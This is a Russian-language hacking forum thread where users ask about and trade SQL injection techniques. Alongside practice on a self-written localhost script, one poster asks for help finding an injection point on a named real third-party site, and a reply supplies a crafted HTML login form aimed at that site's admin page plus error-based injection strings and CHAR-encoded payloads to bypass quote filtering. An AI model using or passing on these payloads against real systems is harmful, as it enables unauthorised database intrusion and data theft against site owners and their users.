Ваши вопросы по уязвимостям.

Если нужно выдернуть всех юзеров, а их очень много - использую прогу, для автоматизации процесса.
К примеру - тот же Сипт.

 

Всем, спасибо! получилось!

 

sql-inj

здравствуйте

http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2

Не выводит ничего!
Хотя запрос вида

http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
работатет и выводиться список всех таблиц,в чем моя ошибка?

мне посоветовали перевести в hex
Тогда такой вопрос?
Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!

 

kevmen, попробуй table_name='user' заменить на TABLE_NAME=CHAR(117,115,101,114)

да и запросы по разному пути
/school/view_cat.php и /view_cat.php

 

Попробуй 'user' заменить на ('user')

 

BloodyMessage,спасибо огромное)обясни только в чем проблема была?в кодировке? =)

 

не работает

 

kevmen, видать ковычки фильтрует

 

BloodyMessage,база?
А разве база сама может фильтровать?
Извини,если вопрос глупый

 

Не могу нащупать скулю

Code:

http://www.hc.kz/index.php?action=showpart&part_id=-1'

Может кто поможет?

 

kevmen, а причем база? Скрипты то фильтруют.

 

Всем привет ) подскажите пожалуста , как вызвать ошибку в Phpbb 3 и выше , что бы узнать пусть сайта...
просбовал с 2х версий не выходит

 

2 BloodyMessage and kevmen
Уточняю, в большинстве подобных случаев никто никого не фильтрует...
Просто на сервере стоит magic_quotes=on, т.е. экранирование кавычек, засчет чего запрос к базе содержащий кавычки портится лишними слешами и поэтому результат запроса возвращает ошибку...
Доходчиво объяснил?

 

Gemini12, сделай такой скриптик:

Code:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>

и вбивай в поле "Логин":

' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Дальше разберёшься?

 

А можно поподробней? Где можно взять эту таблицу значений цифр?

 

Iceangel_,спасибо!Я до этого понять не мог,почему при вводе новостей содержащих кавычки происходило экранирование,благодарю за объяснение!=)

Gemini12,какая таблица значений еще??
кодировщик-декодировщик
http://paulschou.com/tools/xlate/
ищи тут

 

Gemini12
закодировать в чар можно здесь
http://www.webfuture.ru/igo/convert.php

 

Чето не совсем понял куда этот скрипт девать
Не мог бы кинуть ссылочку на статейку про этот способ, или объясни ) заранее благодарен...

 

я же написал скрип самописный и никакой фильтрации нет

 

Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+char(117)+char(115)+char(116)+char(111)+char(109)+char(101)+char(114)+char(115))--